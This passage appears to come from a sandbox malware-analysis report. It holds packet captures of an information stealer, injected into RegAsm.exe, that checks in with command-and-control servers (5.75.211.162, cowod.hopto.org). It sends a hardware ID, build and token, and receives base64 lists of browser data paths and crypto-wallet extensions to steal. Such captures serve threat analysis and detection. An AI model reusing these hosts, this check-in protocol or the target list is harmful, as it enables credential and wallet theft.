Sep 27, 2024 00:29:11.062361956 CEST	896	IN	Data Raw: 09 54 44 61 74 65 54 69 6d 65 01 02 00 8b c0 2c 1e 40 00 0e 0e 54 56 61 72 41 72 72 61 79 42 6f 75 6e 64 08 00 00 00 00 00 00 00 00 02 00 00 00 9c 10 40 00 00 00 00 00 02 0c 45 6c 65 6d 65 6e 74 43 6f 75 6e 74 02 00 9c 10 40 00 04 00 00 00 02 08 Data Ascii: TDateTime,@TVarArrayBound@ElementCount@LowBound\|@TVarArrayBoundArray(@@PVarArray@@@TVarArray@DimCount@Flags@Eleme
Sep 27, 2024 00:29:11.062372923 CEST	1236	IN	Data Raw: 00 00 00 00 00 02 07 52 61 77 44 61 74 61 02 00 02 00 90 b0 21 40 00 0d 0a 54 54 79 70 65 54 61 62 6c 65 fc ff ff 7f ff ff ff 1f e4 10 40 00 01 00 00 00 00 02 00 90 d4 21 40 00 14 0a 50 54 79 70 65 54 61 62 6c 65 ac 21 40 00 02 00 8b c0 ec 21 40 Data Ascii: RawData!@TTypeTable@!@PTypeTable!@!@PPackageTypeInfo"@"@TPackageTypeInfo@TypeCount!@TypeTable@UnitCount@UnitNames@"@PLibMo
Sep 27, 2024 00:29:11.062386036 CEST	1236	IN	Data Raw: 68 65 20 73 69 7a 65 73 20 6f 66 20 75 6e 65 78 70 65 63 74 65 64 20 6c 65 61 6b 65 64 20 6d 65 64 69 75 6d 20 61 6e 64 20 6c 61 72 67 65 20 62 6c 6f 63 6b 73 20 61 72 65 3a 20 00 00 00 00 20 62 79 74 65 73 3a 20 00 00 00 00 55 6e 6b 6e 6f 77 6e Data Ascii: he sizes of unexpected leaked medium and large blocks are: bytes: UnknownAnsiStringUnicodeStringUnexpected Memory Leak@H@JB@HJHJH@JB@HJHJHJHJH@JB@
Sep 27, 2024 00:29:11.062397957 CEST	1236	IN	Data Raw: 24 04 89 50 04 c6 05 c4 9a 44 00 00 8b c7 83 c4 24 5d 5f 5e 5b c3 90 53 56 57 55 83 c4 e0 8b f2 8b f8 8b c7 83 e8 04 8b 00 8b d8 83 e3 f0 83 eb 14 3b de 0f 83 e1 00 00 00 8b d3 c1 ea 02 03 d3 3b d6 76 04 8b ea eb 02 8b ee 8b d7 83 ea 10 83 e0 f0 Data Ascii: $PD$]_^[SVWU;;v$jD$PD$P{\|$upd$+D$;s\+J;sjh SD$Pt-jhSD$PtpZZwztj,
Sep 27, 2024 00:29:11.062408924 CEST	1236	IN	Data Raw: 00 89 f0 5f 5e 5b c3 5b 85 c0 0f 89 2b fa ff ff 31 c0 c3 8b 50 fc f6 c2 07 89 c1 53 8a 1d 4d 70 44 00 0f 85 e3 00 00 00 84 db 8b 1a 75 61 83 6a 0c 01 8b 42 08 74 2c 85 c0 89 4a 08 8d 40 01 89 41 fc 74 07 31 c0 88 03 5b c3 90 8b 4b 04 89 5a 14 89 Data Ascii: _^[[+1PSMpDuajBt,J@At1[KZJQS1[tBJHA19SuCRMpD#t=xDuQRjZY#oQRjZY%4zDtB=xDuj
Sep 27, 2024 00:29:11.062422037 CEST	328	IN	Data Raw: 29 d0 83 d7 ff 21 f8 01 d0 89 c5 89 cf 52 e8 a8 f7 ff ff 5a 85 c0 74 d1 81 fd 2c 0a 04 00 76 03 89 50 f8 89 c5 89 c2 89 f0 89 f9 e8 1f f3 ff ff 89 f0 e8 08 fb ff ff 89 e8 5d 5f 5e 5b c3 90 5e 5b f6 c1 03 0f 84 25 f6 ff ff 31 c0 c3 8b c0 53 8d 58 Data Ascii: )!RZt,vP]_^[^[%1SX`,sx[u3@=<zDt8zD;r;8zDs=<zDt8zD3@SV ;
Sep 27, 2024 00:29:11.067924023 CEST	1236	IN	Data Raw: 88 07 89 d0 83 f9 01 83 df ff c1 e8 1c 81 e2 ff ff ff 0f 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 1b 81 e2 ff ff ff 07 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 1a 81 e2 ff ff ff 03 09 c1 83 c8 30 88 07 Data Ascii: 000000?000G_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	57915	45.132.206.251	80	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:29:12.975645065 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEGIDGDGHCAAAAKKFCG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 3161 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 00:29:12.975683928 CEST	3161	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 Data Ascii: ------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------JKEGIDGDGHCAAA
Sep 27, 2024 00:29:13.748029947 CEST	188	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 22:29:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Served-By: cowod.hopto.org

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	57921	172.67.74.152	80	6240	C:\ProgramData\BKJKEBGDHD.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:29:28.556813955 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Sep 27, 2024 00:29:29.024585009 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:28 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c96b1680e26438b-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Sep 27, 2024 00:29:29.234724998 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:28 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c96b1680e26438b-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Sep 27, 2024 00:29:34.246061087 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Sep 27, 2024 00:29:34.358185053 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:34 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c96b1895b55438b-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	57876	104.102.49.254	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:28 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:28 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 22:28:28 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=056025c7eb32064577f1c177; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 22:28:28 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 22:28:28 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 22:28:28 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 22:28:28 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	57877	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:29 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:28:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	57878	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:30 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:30 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 36 46 36 31 31 46 37 34 30 34 33 34 37 39 32 32 31 31 33 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 2d 2d 0d Data Ascii: ------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="hwid"CD6F611F74043479221132-a33c7340-61ca------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------CFBAKKJDBKJJJKFHDAEB--
2024-09-26 22:28:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:28:31 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|e7c1ea0c612f580bd0cfde06590ff1fd\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	57879	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:32 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGCAKKKEGCAKJKFIIEGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:32 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 43 41 4b 4b 4b 45 47 43 41 4b 4a 4b 46 49 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 41 4b 4b 4b 45 47 43 41 4b 4a 4b 46 49 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 41 4b 4b 4b 45 47 43 41 4b 4a 4b 46 49 49 45 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------CGCAKKKEGCAKJKFIIEGIContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------CGCAKKKEGCAKJKFIIEGIContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------CGCAKKKEGCAKJKFIIEGICont
2024-09-26 22:28:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:28:32 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	57880	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:33 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKFIIIJJKJJKEBGIDGC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:33 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 49 49 49 4a 4a 4b 4a 4a 4b 45 42 47 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 49 49 49 4a 4a 4b 4a 4a 4b 45 42 47 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 49 49 49 4a 4a 4b 4a 4a 4b 45 42 47 49 44 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------IJKFIIIJJKJJKEBGIDGCContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------IJKFIIIJJKJJKEBGIDGCContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------IJKFIIIJJKJJKEBGIDGCCont
2024-09-26 22:28:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:28:34 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	57881	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:34 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:34 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------FIDHIEBAAKJDHIECAAFHCont
2024-09-26 22:28:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:28:35 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	57882	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:36 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 6217 Connection: Keep-Alive Cache-Control: no-cache
